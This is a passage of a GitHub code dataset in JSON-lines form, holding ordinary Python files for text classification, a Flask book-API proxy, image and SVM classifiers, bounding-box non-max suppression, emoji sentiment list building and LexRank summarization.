@paper    :A C-LSTM Neural Network for Text Classification (https://arxiv.org/abs/1511.08630)\r\n\r\n\r\nfrom keras import regularizers\r\nfrom keras.models import Model\r\nfrom keras.layers import SpatialDropout1D, Conv1D\r\nfrom keras.layers import Dropout, Flatten, Dense, Concatenate\r\nfrom keras.layers import LSTM, GRU, Bidirectional, CuDNNLSTM, CuDNNGRU\r\n\r\nfrom keras_textclassification.base.graph import graph\r\n\r\n\r\nclass CRNNGraph(graph):\r\n    def __init__(self, hyper_parameters):\r\n        \"\"\"\r\n            Initialization\r\n        :param hyper_parameters: json, hyperparameters\r\n        \"\"\"\r\n        self.rnn_type = hyper_parameters['model'].get('rnn_type', 'LSTM')\r\n        self.rnn_units = hyper_parameters['model'].get('rnn_units', 650) # large, small is 300\r\n        self.dropout_spatial = hyper_parameters['model'].get('dropout_spatial', 0.2)\r\n        self.l2 = hyper_parameters['model'].get('l2', 0.001)\r\n        super().__init__(hyper_parameters)\r\n\r\n    def create_model(self, hyper_parameters):\r\n        \"\"\"\r\n            Build the neural network\r\n        :param hyper_parameters:json, hyper parameters of network\r\n        :return: tensor, model\r\n        \"\"\"\r\n        super().create_model(hyper_parameters)\r\n        x = self.word_embedding.output\r\n        embedding_output_spatial = SpatialDropout1D(self.dropout_spatial)(x)\r\n\r\n        # select the recurrent cell from rnn_type\r\n        if self.rnn_type==\"LSTM\":\r\n            layer_cell = LSTM\r\n        elif self.rnn_type==\"GRU\":\r\n            layer_cell = GRU\r\n        elif self.rnn_type==\"CuDNNLSTM\":\r\n            layer_cell = CuDNNLSTM\r\n        elif self.rnn_type==\"CuDNNGRU\":\r\n            layer_cell = CuDNNGRU\r\n        else:\r\n            layer_cell = GRU\r\n        # CNN\r\n        convs = []\r\n        for kernel_size in self.filters:\r\n            conv = Conv1D(self.filters_num,\r\n                          kernel_size=kernel_size,\r\n                          strides=1,\r\n                          padding='SAME',\r\n                          kernel_regularizer=regularizers.l2(self.l2),\r\n                          bias_regularizer=regularizers.l2(self.l2),\r\n                          )(embedding_output_spatial)\r\n            convs.append(conv)\r\n        x = Concatenate(axis=1)(convs)\r\n        # Bi-LSTM; the original paper uses LSTM\r\n        x = Bidirectional(layer_cell(units=self.rnn_units,\r\n                                     return_sequences=True,\r\n                                     activation='relu',\r\n                                     kernel_regularizer=regularizers.l2(self.l2),\r\n                                     recurrent_regularizer=regularizers.l2(self.l2)\r\n                                     ))(x)\r\n        x = Dropout(self.dropout)(x)\r\n        x = Flatten()(x)\r\n        # finally the softmax\r\n        dense_layer = Dense(self.label, activation=self.activate_classify)(x)\r\n        output = [dense_layer]\r\n        self.model = Model(self.word_embedding.input, output)\r\n        self.model.summary(120)\r\n","repo_name":"yongzhuo/Keras-TextClassification","sub_path":"keras_textclassification/m09_TextCRNN/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":1634,"dataset":"github-code","pt":"48"} +{"seq_id":"21719825121","text":"from flask import Flask, request, jsonify\nimport requests\nimport json\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app, origins='*')\n\nwith open(\"configfile.json\", \"r\") as config_file:\n    config = json.load(config_file)\n    book_api_url = config.get(\"book_api_url\")\n\n# Route to fetch all books from the book management application\n@app.route('/booksinfo', methods=['GET'])\ndef fetch_books():\n    response = requests.get(f\"{book_api_url}/books\")\n    if response.status_code == 
200:\n book = response.json()\n return jsonify(book)\n else:\n return jsonify({\"error\": f\"Error: {response.status_code} - {response.json()}\"}), 500\n\n# Route to add a new book to the book management application\n@app.route('/booksinfo', methods=['POST'])\ndef add_book():\n data = request.json\n response = requests.post(f\"{book_api_url}/books\", json=data)\n if response.status_code == 201:\n return jsonify({\"message\": \"Book added successfully\"})\n else:\n return jsonify({\"error\": f\"Error: {response.status_code} - {response.json()}\"}), 500\n\n# Route to update a book by ID in the book management application\n@app.route('/booksinfo/', methods=['PUT'])\ndef update_book(book_id):\n data = request.json\n response = requests.put(f\"{book_api_url}/books/{book_id}\", json=data)\n if response.status_code == 200:\n return jsonify({\"message\": \"Book updated successfully\"})\n else:\n return jsonify({\"error\": f\"Error: {response.status_code} - {response.json()}\"}), 500\n\n# Route to delete a book by ID in the book management application\n@app.route('/booksinfo/', methods=['DELETE'])\ndef delete_book(book_id):\n response = requests.delete(f\"{book_api_url}/books/{book_id}\")\n if response.status_code == 200:\n return jsonify({\"message\": \"Book deleted successfully\"})\n else:\n return jsonify({\"error\": f\"Error: {response.status_code} - {response.json()}\"}), 500\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Mkking823/DevOps_Training","sub_path":"full_stack_pro_for BMS/Services/restapi.py","file_name":"restapi.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"866272625","text":"# TODO : write doc\n# Author: John Holliman\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix, classification_report\nfrom sklearn.datasets import load_svmlight_file, dump_svmlight_file\nfrom sklearn.cross_validation import train_test_split\n#from sklearn.svm import SVC\nfrom sknn.mlp import Classifier, Layer, Convolution\nfrom sklearn.preprocessing import MaxAbsScaler\nfrom sklearn.pipeline import Pipeline\nfrom scipy.misc import imread, imresize\nfrom time import time\nimport os\n\n################################################################################\n# Options\nim_dir = os.getcwd() + \"/images\"\nfundus_data_file = os.getcwd() + \"/data/fundus_dataset.svm\"\ntarget_names = np.array(['healthy', 'glaucoma', 'diabetic retinopathy'])\nscale_factor = 0.1\ntest_size = 0.2\ngamma = 0.0005\nkernel = 'poly'\ndegree = 3\n\n################################################################################\n# Load dataset (create it if necessary)\nprint(\"Loading dataset\")\nt0 = time()\nif not os.path.isfile(fundus_data_file):\n t1 = time()\n print(\"\\tGenerating dataset\")\n fundus_dataset = {}\n image_data = []\n target = []\n for fname in os.listdir(im_dir):\n # Load Image and transform to a 1D numpy array.\n im_fundus = imread(im_dir + \"/\" + fname)\n im_fundus = imresize(im_fundus, scale_factor)\n im_fundus = np.array(im_fundus, dtype=np.float64) / 255\n w, h, d = original_shape = tuple(im_fundus.shape)\n print(\"\\t\" + str(original_shape))\n assert d == 3\n im_fundus = np.reshape(im_fundus, (w * h * d))\n image_data.append(im_fundus)\n if 'h' in fname:\n target.append(0)\n elif 'g' in fname:\n target.append(1)\n else: # 'dr'\n target.append(2)\n print(\"\\t\" + fname)\n dump_svmlight_file(np.array(image_data), 
np.array(target), fundus_data_file)\n print(\"\\tDone in %0.3fs.\" % (time() - t1))\n\nimage_data, target = fundus_dataset = load_svmlight_file(fundus_data_file)\nprint(\"Done in %0.3fs.\" % (time() - t0))\nprint(\"Total dataset size:\")\nprint(\"n_samples: %d\" % target.shape[0])\nprint(\"n_features: %d\" % image_data.shape[1])\nprint(\"n_classes: %d\" % target_names.shape[0])\nprint(\"\")\n\n################################################################################\n# Split data into a training and a test set\n\nX_train, X_test, y_train, y_test = train_test_split(image_data, target,\n test_size=test_size, random_state=42)\n\n################################################################################\n# Extract features from the data\n\n# TODO\n\n################################################################################\n# Train NN\n\nx_tnew = []\nfor im in X_train:\n x_tnew.append(im.toarray().reshape((233,350,3)))\n\nx_testnew = []\nfor im in X_test:\n x_testnew.append(im.toarray().reshape((233,350,3)))\n\nX_train = np.array(x_tnew)\nX_test = np.array(x_testnew)\n\ncnn = Classifier(\n layers=[\n Convolution('Rectifier', channels=12, kernel_shape=(3, 3),\n border_mode='full', pool_shape=(2,2), pool_type='max'),\n Layer('Softmax')],\n learning_rate=0.001, \n n_iter=25,\n verbose=True)\nmm_scaler = MaxAbsScaler()\nnn_class= Classifier( \n layers=[\n Layer(\"Maxout\", units=100, pieces=2), \n Layer(\"Softmax\")], \n learning_rate=0.001, \n n_iter=25,\n verbose=True)\n\npipeline = Pipeline([\n ('min/max scaler', mm_scaler),\n ('neural network', nn_class)])\n\n################################################################################\n# Train SVM classification model\n\nprint(\"Fitting the classifier to the training set\")\nt2 = time()\nclassifier = cnn\nclassifier.fit(X_train, y_train)\nprint(\"Done in %0.3fs.\" % (time() - t2))\nprint(\"\")\n\n################################################################################\n# Predict values on test set and plot predictions\n\npredicted = classifier.predict(X_test)\n\nprint(\"Classification report for classifier %s:\\n%s\\n\"\n % (classifier, classification_report(y_test, predicted)))\nprint(\"Confusion matrix:\\n%s\" % confusion_matrix(y_test, predicted))\n\nfor index, prediction in enumerate(predicted):\n plt.subplot(3, 3, index + 1)\n plt.axis('off')\n image = X_test[index].toarray().reshape((233, 350, 3)) * 255\n #image = X_test[index] * 255\n image = np.array(image, dtype=np.uint8)\n plt.imshow(image)\n plt.title('Prediction: %s' % target_names[int(prediction)])\n\nplt.show()\n","repo_name":"jhh3/6.869-final-project","sub_path":"fundus_nn.py","file_name":"fundus_nn.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"3089622117","text":"import data_cleaner\n\nimport pandas as pd\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import roc_curve, roc_auc_score\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\n\nsvc = SVC()\nkernels = {'poly', 'rbf', 'sigmoid'}\n\n\ndef define_model(n, kernel):\n return SVC(C=n, kernel=kernel)\n\n\ndef train_model(svc, x_train, y_train, scaler=None):\n if scaler is not None:\n x_train = scaler.fit_transform(x_train)\n svc.fit(x_train, y_train)\n\n\ndef get_scores(svc, x_test, scaler=None):\n if scaler is not None:\n x = scaler.transform(x_test)\n else:\n x = x_test\n return svc.decision_function(x)\n\n\ndef 
compute_roc_curve(y_test, y_scores):\n return roc_curve(y_test, y_scores)\n\n\ndef compute_auc(y_test, y_scores):\n return roc_auc_score(y_test, y_scores)\n\n\ndef get_max_auc(x_train, y_train, x_test, y_test, verbose=0):\n if verbose:\n fig, ax = plt.subplots()\n df_scores = pd.DataFrame(data=None, columns=['C', 'Kernel', 'AUC', 'Scaled'], )\n best_model = None\n best_auc = -1e31\n best_scaler = None\n minmax_scaler = MinMaxScaler()\n for c in np.arange(0.1, 5.1, 0.1):\n for kernel in ['poly', 'rbf', 'sigmoid']:\n for scaler in [None, minmax_scaler]:\n svc = define_model(c, kernel)\n train_model(svc, x_train, y_train, scaler)\n y_scores = get_scores(svc, x_test, scaler)\n fpr, tpr, threshold = compute_roc_curve(y_test, y_scores)\n auc = compute_auc(y_test, y_scores)\n if auc > best_auc:\n best_auc = auc\n best_model = svc\n best_scaler = scaler\n score_dict = {'C': c, 'Kernel': kernel, 'AUC': auc, 'Scaled': scaler}\n df_scores = df_scores.append(score_dict, ignore_index=True)\n if verbose:\n print(f'C:{c}, Kernel:{kernel}, AUC:{auc}, Scaled:{scaler}')\n ax.plot(fpr, tpr)\n\n if verbose:\n plt.xlabel('False Positive')\n plt.ylabel('True Positive')\n fig1 = plt.gcf()\n plt.show()\n fig1.savefig('trade_off.png')\n\n df_scores = df_scores.sort_values(by=['AUC'], ascending=False)\n return df_scores.iloc[0], best_model, best_scaler\n\n\ndef main():\n x_train, y_train, x_test, y_test = data_cleaner.clean_data('wdbc.pkl', 0.7)\n max_auc = get_max_auc(x_train, y_train, x_test, y_test)\n print(max_auc)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ribesstefano/chalmers_dat410_design_of_ai_systems","sub_path":"module5/src/svm_model.py","file_name":"svm_model.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2819349890","text":"def remove_duplicates():\n \"\"\"\nThis program reads words from user until the user enters\na blank line.\n\n@param: words(String). 
To enter the next word, hit return after the first.\n To stop data entry, hit return twice after the last word.\n@return: The list of words entered in the same sequence they were entered \n without duplicates.\n\"\"\"\n\n # Initialize state variables.\n list_of_words = list()\n\n # Read user input and add to list avoiding duplicates.\n while True:\n word = input(\"Enter a word or hit return to terminate: \")\n if word == '':break\n elif word not in list_of_words:\n list_of_words.append(word)\n\n return list_of_words\n\n\ndef main():\n # Display the output as per specification.\n words = remove_duplicates()\n print()\n for word in words:\n print(word)\n\n\nif __name__ == '__main__':\n main()","repo_name":"engrvitalis/BertelsmanProjects","sub_path":"remove_duplicates.py","file_name":"remove_duplicates.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7108915275","text":"import food_detection_root\nimport os\nimport codecs\nfrom time import time\nimport datetime\nfrom datetime import timedelta\n\nstart_time = time()\ndate = datetime.datetime.today().strftime(\"%Y_%m_%d-%H_%M_%S\")\npath_to_file = date + \" - EmojiSentimentListGeneration_Performance.txt\"\np_file = open(path_to_file, 'a')\np_file.write(date + \" Emoji Sentiment List Generation - Local Execution\" + \"\\n\")\np_file.flush()\n\npath = food_detection_root.ROOT_DIR + os.path.sep + 'data' + os.path.sep\nemoji_sentiment_list_file = codecs.open(path + \"list - emoji_sentiment_data.csv\", encoding='utf-8')\nemoji_sentiment_list = emoji_sentiment_list_file.read().splitlines()\nemoji_sentiment_list_file.close()\n\nunicode_emoji_list_file = codecs.open(path + \"list - unicode_emojis.txt\", encoding='utf-8')\nemoji_list = unicode_emoji_list_file.read().splitlines()\nunicode_emoji_list_file.close()\naux_emojis_dict = {}\nemojis_dict = {}\nfor aux in emoji_list:\n aux_emoji = aux.split('\\t')\n emojis_dict[aux_emoji[2]] = [aux_emoji[0], aux_emoji[1], aux_emoji[3]]\nunicode_emoji_list_file.close()\ncomplementary_characters_list_file = codecs.open(path + \"list - complementary_characters.txt\", encoding='utf-8')\ncomplementary_characters_list = complementary_characters_list_file.read().splitlines()\ncomplementary_characters_list_file.close()\ncomplementary_characters_dict = {}\nfor aux in complementary_characters_list:\n aux_char = aux.split('\\t')\n complementary_characters_dict[aux_char[2]] = [aux_char[0], aux_char[1], aux_char[3]]\n\nfinal_emoji_sentiment_list_file = codecs.open(path + \"list - emojis_sentiment.csv\", encoding='utf-8', mode='a')\ncount = 0\nfor text in emoji_sentiment_list:\n spaces = text.split(\",\")\n print(spaces)\n if 'Emoji' not in spaces:\n emoji = spaces[0]\n occurrences = spaces[2]\n position = spaces[3]\n negative = spaces[4]\n neutral = spaces[5]\n positive = spaces[6]\n if emoji in emojis_dict.keys():\n emoji_type = 'Emoji'\n unicode = emojis_dict[emoji][1]\n emoji_id = emojis_dict[emoji][0]\n emoji_name = emojis_dict[emoji][2]\n else:\n if emoji in complementary_characters_dict.keys():\n emoji_type = 'Additional Character'\n unicode = complementary_characters_dict[emoji][1]\n emoji_id = complementary_characters_dict[emoji][0]\n emoji_name = complementary_characters_dict[emoji][2]\n else:\n emoji_type = 'Not identified'\n unicode = ''\n emoji_id = ''\n emoji_name = ''\n final_emoji_sentiment_list_file.write(emoji_id + \";\" + emoji + \";\" + unicode + \";\" + emoji_type\n + \";\" + occurrences + \";\" + 
position + \";\" + negative\n + \";\" + neutral + \";\" + positive\n + \";\" + emoji_id + \";\" + emoji_name + \"\\n\")\n count += 1\nunicode_emoji_list_file.close()\n\np_file.write(\"Total elements in new list: \" + str(count) + \"\\n\")\nexecution_time = time() - start_time\np_file.write(\"Execution time: \" + str(timedelta(seconds=execution_time)) + \"\\n\")\np_file.flush()\n","repo_name":"katherine110992/FoodDetection","sub_path":"list_generation/emoji_with_sentiment_generation.py","file_name":"emoji_with_sentiment_generation.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12720594292","text":"# %%\nimport json\nfrom inference_schema.schema_decorators import input_schema, output_schema\nfrom inference_schema.parameter_types.standard_py_parameter_type import StandardPythonParameterType\n\n# %%\ndef init():\n print(\"This is init\")\n\n\n\n# %%\n@input_schema('data', StandardPythonParameterType('input data'))\n@output_schema(StandardPythonParameterType('test is inputdata'))\ndef run(data):\n test = json.loads(data)\n print(f\"received data {test}\")\n return f\"test is {test}\"\n\n\n# %%\nfrom inference_schema import schema_util\n\n# %%\nschema_util.get_input_schema(run)\n# %%\nschema_util.get_output_schema(run)\n# %%\nschema_util.get_schemas_dict()\n# %%\nschema_util.is_schema_decorated(run)\n# %%\n","repo_name":"mutazag/misc","sub_path":"py_inference_schema/entry_script.py","file_name":"entry_script.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41654863670","text":"#!/usr/bin/env python3\n\"\"\"\nProject title: CollembolAI\nAuthors: Stephan Weißbach, Stanislav Sys, Clément Schneider\nOriginal repository: https://github.com/stasys-hub/Collembola_AI.git\nModule title: nms\n.py\nPurpose: supresses overlapping bounding boxes that are overlapping more\n then the specified IoU threshold\nDependencies: See ReadMe\nLast Update: 18.02.2022\n\"\"\"\n\nimport pandas as pd\nfrom itertools import combinations\n\n\ndef non_max_supression(df_pred, IoU_threshold=0.7, area=1000000):\n \"\"\"Identify overlapping annotations boxes in a dataframe created from a coco instance, identify and remove duplicates based\n on IoU threshold. 
If class agnostic is true, only overlapping boxes from the same label will be removed.\"\"\"\n    nms_df = pd.DataFrame()\n    for image_id in df_pred.image_id.unique():\n        # get a dataframe with predictions of certain image\n        sdf_pred = df_pred[df_pred[\"image_id\"] == image_id].copy()\n        sdf_pred[\"id_temp\"] = sdf_pred[\"id\"]\n        # create a dataframe having all possible combinations between predicted bounding boxes\n        df = pd.DataFrame(combinations(sdf_pred[\"id\"], 2), columns=[\"id_x\", \"id_y\"])\n        # add information to new dataframe\n        df = df.merge(\n            sdf_pred[[\"id_temp\", \"box\", \"score\", \"name\"]],\n            how=\"left\",\n            left_on=\"id_x\",\n            right_on=\"id_temp\",\n        ).merge(\n            sdf_pred[[\"id_temp\", \"box\", \"score\", \"name\"]],\n            how=\"left\",\n            left_on=\"id_y\",\n            right_on=\"id_temp\",\n        )\n        if df.shape[0] == 0:\n            continue\n        # compute intersection, union and IoU between predicted bounding boxes\n        df[\"intersection\"] = df[[\"box_x\", \"box_y\"]].apply(\n            lambda x: x[0].intersection(x[1]).area, axis=1\n        )\n        df[\"union\"] = df[[\"box_x\", \"box_y\"]].apply(\n            lambda x: x[0].union(x[1]).area, axis=1\n        )\n        df[\"IoU\"] = df[\"intersection\"] / df[\"union\"]\n        df = df[df[\"IoU\"] > IoU_threshold]\n        df['drop'] = df['id_y'].where(df['score_x'] > df['score_y'], df['id_x'])\n        sdf_pred = sdf_pred[~(sdf_pred['id'].isin(df['drop']))] \n        sdf_pred.drop(labels=['id_temp'], axis=1, inplace=True)\n        nms_df = pd.concat([nms_df, sdf_pred], axis=0)\n    nms_df = nms_df[nms_df[\"area\"] < area]\n    return nms_df\n","repo_name":"stasys-hub/Collembola_AI","sub_path":"src/postprocess/nms.py","file_name":"nms.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"10616217972","text":"import tensorflow as tf\nimport os\nimport cv2\nimport numpy as np\nimport glob\n\nROOT_DIR = os.getcwd()\nDATA_DIR = ROOT_DIR + '/data'\nRESOURCE_DIR = ROOT_DIR + '/images'\nMODEL_DIR = ROOT_DIR + '/model'\n\n# All classes for categorization\nclasses = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', 'Sandal',\n           'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n\nsess = tf.Session()\n\n# Load and restore the trained model\nsaver = tf.train.import_meta_graph('model/model.ckpt.meta')\nsaver.restore(sess, tf.train.latest_checkpoint('model'))\n\ngraph = tf.get_default_graph()\n\n# Get the tensors which will be needed\n# for the prediction. 
The names must be \n# assigned during the training.\nx = graph.get_tensor_by_name('x:0')\ny = graph.get_tensor_by_name('y:0')\n\nimg_size = 28\n\npath = os.path.join('images', 'test', '*g')\nfiles = glob.glob(path)\nfor img_file in files:\n print('working on ', img_file)\n \n # Load the image in grayscale\n test_im = cv2.imread(img_file, cv2.IMREAD_GRAYSCALE)\n \n # Or convert an already loaded color image to grayscale\n # test_im = cv2.cvtColor(test_im, cv2.COLOR_BGR2GRAY)\n \n # Resize an image\n # test_im = cv2.resize(test_im, (img_size, img_size))\n \n # resize image and invert grayscale\n test_im = 255 - cv2.resize(test_im, (img_size, img_size), cv2.INTER_LINEAR)\n \n # If needed, see the loaded, resized and inverted image\n # from jupyter notebook\n # plt.imshow(test_im, cmap=plt.get_cmap('Greys_r'))\n # plt.show()\n \n # Reshape the image when using color images\n # test_im = test_im.reshape(1, img_size, img_size, num_channels)\n \n # Flatten the image and then reshape it to convert the \n # matrix image (28x28) into a vector of size (1, 784)\n test_im = test_im.flatten().reshape(1, 784)\n \n # If needed, see the image (from python script)\n # cv2.imshow('image', test_im)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n # THIS GETS OUR LABEL AS A INTEGER\n # label = classes[y_train.argmax()]\n \n # Lets get the prediction as integer which will be the \n # key in the classes list above\n prediction = sess.run(y, feed_dict={x: test_im}).argmax()\n\n print(classes[prediction])\n \n # When needed, check the prediction output with image\n # plt.title('Prediction: %d Label: %s' % (prediction, classes[prediction]))\n # plt.imshow(test_im.reshape([28,28]), cmap=plt.get_cmap('Greys_r'))\n # plt.show()\n","repo_name":"moshfiqur/wicked-wench","sub_path":"fashion-mnist/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6014970284","text":"from collections import defaultdict\nfrom os import walk\nfrom math import sqrt\n\n\ndef idf_modified_cosine(x, y, idf):\n \"\"\"\n Computes the idf modified cosine of two sentences, using the idf values from training\n :param x: sentence x\n :type x: str\n :param y: sentence y\n :type y: str\n :param idf: inverse document frequency of words seen in training\n :type idf: defaultdict\n :return: idf-modified-cosine value of both sentences (similarity between them)\n :rtype: float\n \"\"\"\n x_words = x.split()\n y_words = y.split()\n words = x_words + y_words\n # Pw∈x,y tfw,xtfw,y(idfw)^2\n numerator = 0\n for word in words:\n numerator += x_words.count(word) * y_words.count(word) * (idf[word]**2)\n # √(Pxi∈x(tfxi,xidfxi)^2) × √(Pyi∈y(tfyi,yidfyi)^2)\n denominator_x = 0\n for word in x_words:\n denominator_x += (x_words.count(word) * idf[word])**2\n denominator_y = 0\n for word in y_words:\n denominator_y += (y_words.count(word) * idf[word])**2\n denominator = sqrt(denominator_x) * sqrt(denominator_y)\n return numerator/denominator\n\n\ndef power_method(cosine_matrix, matrix_size, error_tolerance):\n \"\"\"\n Compute the stationary distribution of a Markov chain\n :param cosine_matrix: Cosine Matrix from lexrank\n :type cosine_matrix: dict\n :param matrix_size: Size of the matrix(sentence)\n :type matrix_size: int\n :param error_tolerance: Error tolerance (threshold over which to filter out edges)\n :type error_tolerance: float\n :return: Stationary distribution of a Markov chain (e.g. 
cosine matrix)\n    :rtype: dict\n    \"\"\"\n    p0 = 1/matrix_size\n    t = 0  # p_t-1\n    p = {}\n\n    for x, y in cosine_matrix.keys():  # Initialize dictionary p\n        p[x] = p0\n\n    while True:\n        pt = {}\n        for x, y in cosine_matrix.keys():\n            pt[x] = cosine_matrix[(x, y)] * p[x]\n        result = 0\n        for x in pt.keys():\n            result += (pt[x] - p[x]) ** 2\n        p = pt\n        if result < error_tolerance:\n            break\n    return p\n\n\ndef lexrank(sentences, cosine_threshold, idf, error_tolerance):\n    \"\"\"\n    Computes lexrank scores for a given article (list of sentences)\n    :param sentences: An array S of n sentences\n    :type sentences: list of list\n    :param cosine_threshold: cosine threshold for LexRank algorithm\n    (reduce number of edges, non-significant sentence similarities)\n    :type cosine_threshold: float\n    :param idf: inverse document frequency values for words seen in training\n    :type idf: defaultdict\n    :param error_tolerance: makes the Markov chain robust to errors (https://goo.gl/VFhiqv) e.g. 0.00001\n    :type error_tolerance: float\n    :return: A dictionary L of LexRank scores.\n    :rtype: dict\n    \"\"\"\n    n = len(sentences)\n    cosine_matrix = {}  # size n*n\n    degree = {}  # size n\n    l = {}  # size n\n\n    for i in range(n):  # for i <- 1 to n do...\n        for j in range(n):  # for j <- 1 to n do...\n            cosine_tuple = (i, j)\n            cosine_matrix[cosine_tuple] = idf_modified_cosine(sentences[i], sentences[j], idf)\n            if cosine_matrix[cosine_tuple] > cosine_threshold:\n                cosine_matrix[cosine_tuple] = 1\n                degree[i] = 1 if i not in degree else degree[i]+1\n            else:\n                cosine_matrix[cosine_tuple] = 0\n    # end\n    for i in range(n):  # for i <- 1 to n do...\n        for j in range(n):  # for j <- 1 to n do...\n            cosine_tuple = (i, j)\n            cosine_matrix[cosine_tuple] = cosine_matrix[cosine_tuple]/degree[i]  # might need to handle degree[i]\n    # end\n    l = power_method(cosine_matrix, n, error_tolerance)\n    return l\n\n\ndef summarizer(filename, cosine_threshold, idf, error_tolerance):\n    \"\"\"\n    Summarizes a text file using LexRank algorithm\n    :param filename: File to summarize\n    :type filename: str\n    :param cosine_threshold: cosine threshold for LexRank algorithm\n    (reduce number of edges, non-significant sentence similarities)\n    :type cosine_threshold: float\n    :param idf: dictionary containing inverse document frequencies of words seen in training\n    :type idf: dict\n    :param error_tolerance: makes the Markov chain robust to errors (https://goo.gl/VFhiqv) e.g. 
0.00001\n    :type error_tolerance: float\n    :return: summary of file passed in @filename\n    :rtype: str\n    \"\"\"\n    sentences, sentences_rank = extract_text(filename)\n    scores = lexrank(sentences, cosine_threshold, idf, error_tolerance)\n    # consider using arbitrary summary length cutoff instead of filtering out non-zeroes\n    sorted_scores = {k: v for k, v in scores.items() if v != 0}\n    sorted_scores = sorted(sorted_scores.items(), key=lambda x: x[1], reverse=True)\n    summary = ''\n    for k, v in sorted_scores:\n        summary += sentences[k] + '\\n'\n    return summary\n\n\ndef load_file(filename):\n    \"\"\"\n    Extracts words and their respective inverse document frequencies from file created in training section.\n    :param filename: name of file made in training\n    :type filename: str\n    :return: dictionary of words with their respective idf values {word:idf}\n    :rtype: defaultdict\n    \"\"\"\n    words_idf = defaultdict(float)\n    with open(filename, 'r') as infile:\n        for line in infile:\n            word, count, idf = line.split()\n            words_idf[word] = float(idf)\n    return words_idf\n\n\ndef extract_text(filename):\n    \"\"\"\n    This function processes articles from the CNN dataset, extracts all the sentences in a list\n    along with a dictionary that maps the sentences with their respective sentence labels.\n    :param filename: File with text to summarize\n    :type filename: str\n    :return: list of sentences and a dictionary that maps each sentence to its sentence label\n    :rtype: list, dict\n    \"\"\"\n    text = ''\n    # read article\n    with open(filename, 'r') as infile:\n        text = ''.join(infile.readlines())\n    # split sections\n    text_tokens = text.split('\\n\\n')\n    url = sentences = highlights = maps = ''\n    if len(text_tokens) == 4:\n        url, sentences, highlights, maps = text_tokens\n    else:\n        # some entities have extra '\\n\\n' between them\n        url = text_tokens[0]\n        sentences = text_tokens[1]\n        highlights = text_tokens[2]\n        for i in range(3, len(text_tokens)):\n            maps += text_tokens[i] + '\\n'\n        else:\n            maps = maps[:-1]\n    # entities\n    entities = {mapping.split(':')[0]: mapping.split(':')[1] for mapping in maps.split('\\n')}\n    # sentences\n    entity_tag = '@entity'\n    while entity_tag in sentences:\n        start_index = sentences.find(entity_tag)\n        end_index = start_index + len(entity_tag)\n        while sentences[end_index+1].isdigit():\n            end_index += 1\n        entity = sentences[start_index:end_index+1]\n        sentences = sentences.replace(entity, entities[entity])\n    # separate sentences from 'sentence label'\n    sentences_rank = {token.split('\\t\\t\\t')[0]: token.split('\\t\\t\\t')[1]\n                      for token in (sentence for sentence in sentences.split('\\n'))}\n    sentences = [sentence for (sentence, rank) in sentences_rank.items()]\n    return sentences, sentences_rank\n\n\ndef word_counter(path):\n    \"\"\"\n    Iterates through all files in path to obtain the inverse document frequency (idf) values for each word\n    :param path: path from which to obtain summary files\n    :type path: str\n    :return: dictionary containing the counts of how many documents a word was seen\n    in along with the total number of documents\n    :rtype: tup (dict, int)\n    \"\"\"\n    single_document_word_counts = {}\n    multiple_document_word_count = defaultdict(float)\n    number_of_documents = 0\n    for (dirpath, dirnames, filenames) in walk(path):\n        for filename in filenames:\n            if filename.endswith('.summary'):\n                continue\n            # read text\n            sentences, sentences_rank = extract_text(path + filename)\n            sentences = ' '.join(sentences)\n            # account for having seen each word once in the current document\n            for word in 
sentences.split():\n                    if word not in single_document_word_counts:\n                        single_document_word_counts[word] = 1\n                # add one count for having seen each of the words in yet another document\n                for key in single_document_word_counts.keys():\n                    multiple_document_word_count[key] += 1\n                single_document_word_counts = {}\n                number_of_documents += 1\n    return dict(multiple_document_word_count), number_of_documents\n","repo_name":"esamudio/extractive-summarizer","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
